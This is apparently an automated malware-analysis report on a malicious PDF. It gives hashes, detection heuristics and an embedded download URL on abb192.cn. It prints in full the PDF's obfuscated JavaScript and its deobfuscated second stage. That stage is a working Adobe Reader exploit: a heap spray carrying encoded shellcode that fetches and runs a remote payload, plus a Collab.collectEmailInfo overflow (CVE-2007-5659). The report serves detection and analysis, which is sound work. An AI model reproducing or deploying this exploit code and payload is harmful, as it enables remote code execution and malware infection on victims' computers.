Malicious PDF — malware analysis report

Static analysis result for SHA-256 1f1fc7f5de6745f7…

MALICIOUS

PDF

Size: 4.6 KB
Created: 2008-08-06 01:42:27
Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12)
First seen: 2026-05-08
MD5: 4d12229faa87828cd2c24f0b1ce9d9a0
SHA-1: 5db6fa650d9abbd6d1779a22c89be0f6c36539cc
SHA-256: 1f1fc7f5de6745f7aaafbc43f7c5fdbe101f37890f61c06eec03b5220939fd1b
Risk score: 308

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), which is often employed to deobfuscate and execute malicious code. The extracted JavaScript object, javascript_obj0013_001.js, is also noted as suspicious due to script obfuscation indicators. The primary intent appears to be the execution of arbitrary code via the eval() function within the JavaScript stream.

Machine Learning

  • Nyx PDF Classifier: malicious score 1.0000

Heuristics (8)

  • Collab.collectEmailInfo — CVE-2007-5659 (critical; exact CVE match; rule CVE_2007_5659)
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action (low; 3 related findings; rule PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function MFMn0d4cUGQ(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function IP1jql(L5NHW5P89Myzmv){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(L5NHW5P89Myzmv)"+";"+"}");eval("function EHioBEpFUiS(YXeavM4VuK9){var jqqQxEmJGaLVOp="+"0,GUl69P3kglYszN=YXeavM4VuK9.l"+"en"+"gth,f6aam9EM5=10"+"2"+"4,nZWlhzfCk,dAn5rYcj,zr46RdsarFeTfD='',ivy79jrSu=jqqQxEmJGaLVOp,plD0Um0LpF=jqqQxEmJGaLVOp,q8NLM2o3F=jqqQxEmJGaLVOp, …
  • PDF exploit shellcode contains an embedded download URL (high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL)
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream (low; rule PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage (high; rule PDF_GENERIC_STAGE_RECOVERY)
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact (medium; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://abb192.cn/spl3/load.php?id=18&spl=4 (referenced by PDF JavaScript)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x369 | 6335 bytes
SHA-256: 069b27fa67a4f6136b11b48923ada4984890d37dde96f1166cbd91f902f837cb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 126 of 242 identifiers look randomly generated (e.g. 'KD8Oq8C4KD8nLDC4KVQ9wlC4KV89LVC4UDnBwD'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function MFMn0d4cUGQ(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function IP1jql(L5NHW5P89Myzmv){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(L5NHW5P89Myzmv)"+";"+"}");eval("function EHioBEpFUiS(YXeavM4VuK9){var jqqQxEmJGaLVOp="+"0,GUl69P3kglYszN=YXeavM4VuK9.l"+"en"+"gth,f6aam9EM5=10"+"2"+"4,nZWlhzfCk,dAn5rYcj,zr46RdsarFeTfD='',ivy79jrSu=jqqQxEmJGaLVOp,plD0Um0LpF=jqqQxEmJGaLVOp,q8NLM2o3F=jqqQxEmJGaLVOp,FBnZJXRlR=Ar"+"ra"+"y(63,53,56,25,3,46,61,58,51,14,0,0,0,0,0,0,21,49,15,16,44,26,36,28,34,20,40,8,59,32,18,30,39,52,47,55,5,24,45,10,33,1,57,0,0,0,0,11,0,7,22,0,43,54,13,27,4,35,17,37,48,38,2,50,23,12,9,62,42,29,19,60,31,6,41);f"+"o"+"r(dAn5rYcj=M"+"at"+"h.c"+"ei"+"l(GUl69P3kglYszN/"+"f6aam9EM5)"+";dAn5rYcj>jqqQxEmJGaLVOp;dAn5rYcj-"+"-){fo"+"r(nZWlhzfCk=Ma"+"th.m"+"in(GUl69P3kglYszN,f6aam9EM5);nZWlhzfCk>jqqQxEmJGaLVOp;nZWlhzfCk-"+"-,GUl69P3kglYszN-"+"-){q8NLM2o3F|"+"=(FBnZJXRlR[YXeavM4VuK9.cha"+"rCod"+"eAt(ivy79jrSu+"+"+)-48])<"+"<plD0Um0LpF;if(plD0Um0LpF){zr46RdsarFeTfD+"+"=IP1jql"+"(245^q8NLM2o3F&"+"2"+"5"+"5);q8NLM2o3F>"+">="+"8;plD0Um0LpF-"+"="+"2;}el"+"se{plD0Um0LpF="+"6"+";}}"+"}return (zr46RdsarFeTfD);}var 
CCKRh8b=implode('',['@BKkabfPuy3d','m','s','KzA','bfo@R','rF','nbfVaOK','k','qefS9p','6Fc5zkYozm','gb6JNNrAgNJAPOq5f_','LPcefRfEwXlEtlDm','u1a9DkxW','WX7ntJ','B','97RGpVi@_','UP','GmrF','@S','fRfEwXl','EtlD5u','mC','5zF','YeZSaPwX4gZ','PHNJ5MW7','iis_S9ogiy','xKD','mWqd@Lfo@','8','giyxKDmW','qd9iU1weJAandzn','8E1KpfRfEwX','l','Et','lD5VXcOzXYO','K','PgW3','STP6X4gZPHNJ5MW7iisdea8V8','@xKFYn2Xg','bfRfEw','XlEtlD7','G1Kb6F','c','5zkYo','z','mgb6m3OKMyeG','Fgo7','Au8','u19b6M','IO','U','1VEK','AY','8Kd','A','orF','Tbfo','@pGiTg3Ab','bD','kTgz','8@BKk','ab6RvO2','FeOU1','K','pfMgnzX','bN3XCe','61C4Uly','aD','AC4Ulya','DA','C','4U','l','ya','DAC4UA8n','L','VC','4JAy4','wVC42l4','g','_8C4U8Tx_8C4U8Tpq','AC','4','K','D','8EDA','C4KD','aaDAC4K','DS','9_V','C4','KD','f','p','qlC42D8nd','VC4','2D89','L','DC4U8S','W','wDC4U','D8yq','D','C4K','D8nL','DC42lY4LDC','4KDyvLDC4K8','89GlC4Ula','B','dAC4K889GlC4','2','llndlC4K','D8bD','A','C4KD8nLVC42','lY4LDC42Vqp','DA','C42lhSDlC','4KDhv_','AC4UAnpDAC4KD','8NqAC4KD8n','LDC4KVQ9w','l','C42','Vq4','LVC','4','J','l','nSDlC42','lcv','qAC4UAn4_A','C','4','KD8NwDC','4KD8nLDC','4','KVQ9w','lC42Vq','4dlC4JVQeDlC4KAT','4wDC4UAnx','GDC4KD8','bGDC4KD8','n','LDC4K','VQ9wlC42Vq4dAC4UAT','SD','l','C4UA','8OqAC','4','UAn','SwDC4K','D8','EwVC','4KD8','nLD','C4KVQ','9wlC42V','qBLD','C42A','leDlC','4U','AQowlC4UAn4','DlC','4KD8Oq8C4KD8nLDC4KVQ9wlC4KV89LVC4UDnBwD','C4K8QO','DVC42l4','vqlC42Dn','v_VC4KDfpwlC4KD8n_','DC42','Vh','4L','DC','4K8Q9','w','lC42lYgLVC4KDS','N_V','C','4K','DleqlC42lYx','L','lC42','Dnx_V','C4U','Anx_8C','4','KD','89GlC4KD','8nLDC4U8n','x','LDC42Dca_8','C4','K8','8E','g','AC4JlfpDl','C4KD8','nLDC4','2l44L','DC42','Dyv_VC4','2AQ','9GlC42A','89DVC42l4x','L','D','C4JV8N_VC4KA','TSDlC','4KD8n','LDC42V8nLDC4','KVQ9Gl','C4U8c','BL','VC42V44g','DC42VQ9GlC','4UAnBdlC','4K','D8eq','DC4','KD8nLDC4','KVQ','ndVC42AfgLDC42V','y4L','D','C4JVh8qAC42A','f','SqVC4KD','SNLDC4U8QoDlC4K','D8nLDC4K8QNGAC42lYgLD','C4KDyv_VC4K','Dle','qlC42','lY','xLlC
','42Dn','x_VC4KV8bD','l','C4KD8nL','DC4U8c4LDC42Vn4','g8','C4KVQnd','VC4','U','D','eELVC42VeE','GlC4','KATxdV','C4J','V8oqVC42','VeOLD','C4','KVQ9','GlC4U8','cBdAC','42V44_VC4','2V','Q','9GlC','4UAnBd','l','C4KD8EdVC4KD8nL','DC4K','D8eqlC4K8QNGAC42','lY','gLDC4K','Dnv_VC4KD','AeqlC42lYxL','lC42D','n','x_V','C42D8bDlC4KD8nLDC4U','8c4LDC42l','Y','vGAC42','D8N','_V','C','4KDleqlC42l','YxLlC42Dnx','_VC4KD8bDlC4KD8','nLDC4','KVlnL','DC42V','A','O','glC4UAlndVC4UAlnd','VC','4UA','lndVC4UAlndVC4UAyB','DVC','42Vc4LV','C42lY','xdVC4U','A','AE','qlC42VANG8C4UA8N','GAC42lYx_VC','4','2','lYp','DAC4KDn8wAC4','2VaBGlC42Vq4dAC','4K8e9G','lC','42','lYadA','C42','Dh8','wVC4KDeoDlC42VqvDVC4K8qBG','lC4K','D','eELDC','4UDeNDVC4KV4xw','lC4Ul','av_DC4','2AendV','C4UDe','O_','8C','4','KDTvq8','C42D8nqAC4KAAy_l','C','4KDn8wVC4','2AhxqDC4KDenLAC4KV8NG','DC4K','AlbGlC','4KAhaglC4','K','8QO_A','C4','2','V','cpqVC4','UAY','B','GlC42Vc','BG','lC4KDeELVC4U8qgwAC4KDyBGlC42lY','vglC42D','yx_lC4JAa4','d','VC4KD','S','9G','lC','4KDe9','GlC4','2V','hx','qVC4','2AAO','LAC4KD','8ndlC4','K','ASbDlC4KATvqAC42','V','QN','GA','C','4KVyxgD','C','4KVTvL','AC4KD8N_A','C4','JlYBG8C4JlT_G','lC42A8Eq','V','C42lhxwDC42laB','w','AC4JA','qgqAC42AlEw','AC4','2ll9DAC4','JlyxwDC42leWGAC','42A8EDAC','42l89DVC4','2lY','Bq','AC4JlTxqDC4Jl','TBG8C42lqgwD','C4J','AA9GlC4JAf','gqAC4Jl','yxwlC4','2leWGAC4JAYgGDp','8','V8@B','Kka','bfzOt3AO','EK8@iG1TSUl','TpGAT','pD','8@BKkabfR','aoKM0bf','o@0','LF','a9zVa5','u','mC5zFYe31','x','p6A','9','p6MIOU1a9','D','kxWW','X7ntJB97R@iG1','F7zm','TLzXqp','fe@Sf','R','aoKM07uAfEG8G','LG1','4NZX@8giyxKDmWq','d@iG1c5r','FyErkT','n','3S','p4fMqpq8T4fM','qpq8TxfS','9p','fRfEwX','l','EtlD','bfo@BtFINwmhEwzaig8osrMu8giyxKDmWqd3p6','X4gZPHNJ','5','MW','7','iis_S','9p6MIOU17Og','XUEqA','0sZPpbfo@','S','udy','NG','lq','o','EDGn3','X@iu1TSU','lTpGATpqS','Evt','PEbDPyoD','8@Bzmab','uS4NZX','@','PgP','Go_dbOdFo','oKoTLG5uo','rRDE','ZVNW_','irdLVTHzAh','0LPxOz8','ZerPwo','tkSWzDq7V','SG','pVi@83Pjet'
,'zBNE','D5mgP','G','o_dbOdFooKt','@i','G1','w','eJAan','dzn8E','1Op6Rv','O2F','eOJ8@iU1Kb','6Fc5zkYozmgbfV','Ue','Jk3E_M','i','e','fS@LU14N','ZX@8JDYy_k@iG1IbUXgBKPC','WKFa9WF','aEKPE5Ze','Y','tzzY','O','KPgW3SGL','G1qW','gM','AN31','KpfioyUD','I5','6XCbUmIErF','ud','utAtV','F3x61GLG1','4','NZX@8WdYt_P','@iG1gnzM','@vLXaNriu','8','JDYy_kg','g3PI','OK','VYeuAGP','fi','oy','UDI5VkuNZXQyUSh8ueqWgMAN','ZeberkaNg','MuxqSGLG1','G','931u','SfdDyJ','5G7','EAJbfoKpu8@B6Q@SuSDoEM','7oz','dhiE1KiG','1hp6','QvpfdDyJ5G77AJbu','o@xqS@PUH@8W','dYt_','P5Nqt@','PG1','h8f','S@PUH@SfdDyJ5','G7EA','Jbf','oKp','Vl@B6Q@8Wd','Y','t_P','5','Nq','t@PG1h8u1','rmU','1u','8','WdYt_P5b','qt@PG1n','8fS','@','LU1gmZ','XcEU8j5','rda','SfS9p6MIOU1','u','e','tDbo','7d2e_Vjbfo@','42mCEJ','kIbKFux','fQcbDkTgrQcb','DkTgZ1GLG1ne','rP3n3SuetDb','o7d2e_Vj5umC5zFYe31rpulY8qla8u1','uetD','bo7d2e_VjbVS','KpuPVWdk','DsW56NgF9p','uMuoz','Xggzm3mrkpEEME','OKF@iG','1et3m3','NZkggz','m3m','rF','byKDUNrP3oLmv','t3','S9EKMps','Z','8@x6','13izXNs','G','1','ue','tDbo7d2','e_VjH','KS9p','f','H@iU1QH3ibmzVc9ESGLq']);");eval(EHioBEpFUiS(CCKRh8b));}
generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery (sixbit-xor-table) from JavaScript object 13 at offset 0x369 | 2498 bytes
SHA-256: 81fd7535896039ae9b5576d1fdc7267b134cba3e4c83f3ae787ce71fe3d37211
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var ihdXSzQD = new Array(); function Vga1nq3R2M8Gju(Ix3rES7Y, r6cjWqOUWzVJ) { while (Ix3rES7Y.length*2<r6cjWqOUWzVJ){Ix3rES7Y += Ix3rES7Y;} Ix3rES7Y = Ix3rES7Y.substring(0,r6cjWqOUWzVJ/2); return Ix3rES7Y; } function nlrus8dnY2() { var Xs14yYDiep = 0x0c0c0c0c; var JfrfCr = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u732F%u6C70%u2F33%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3831%u7326%u6C70%u343D"); var Qko0ks9 = 0x400000; var IryuJ = JfrfCr.length * 2; var r6cjWqOUWzVJ = Qko0ks9 - (IryuJ+0x38); var Ix3rES7Y = unescape("%u9090%u9090"); Ix3rES7Y = Vga1nq3R2M8Gju(Ix3rES7Y, r6cjWqOUWzVJ); var OBpm31Jjjb = (Xs14yYDiep - 0x400000)/Qko0ks9; for (var LhiIYcBgGy=0;LhiIYcBgGy<OBpm31Jjjb;LhiIYcBgGy++) { ihdXSzQD[LhiIYcBgGy] = Ix3rES7Y + JfrfCr; } } 
function AmxclCuV() { var yGtDa = app.viewerVersion.toString(); yGtDa = yGtDa.replace(/\D/g,""); var YYtOi = new Array(yGtDa.charAt(0),yGtDa.charAt(1),yGtDa.charAt(2)); if ((YYtOi[0] == 8 && ((YYtOi[1] == 1 && YYtOi[2] < 2) || YYtOi[1] < 1)) || (YYtOi[0] == 7 && YYtOi[1] < 1) || (YYtOi[0] < 7)) { nlrus8dnY2(); var hXGcYZMHAd = unescape("%u0c0c%u0c0c"); while(hXGcYZMHAd.length < 44952) hXGcYZMHAd += hXGcYZMHAd; this.collabStore = Collab.collectEmailInfo({subj: "",msg: hXGcYZMHAd}); } } AmxclCuV();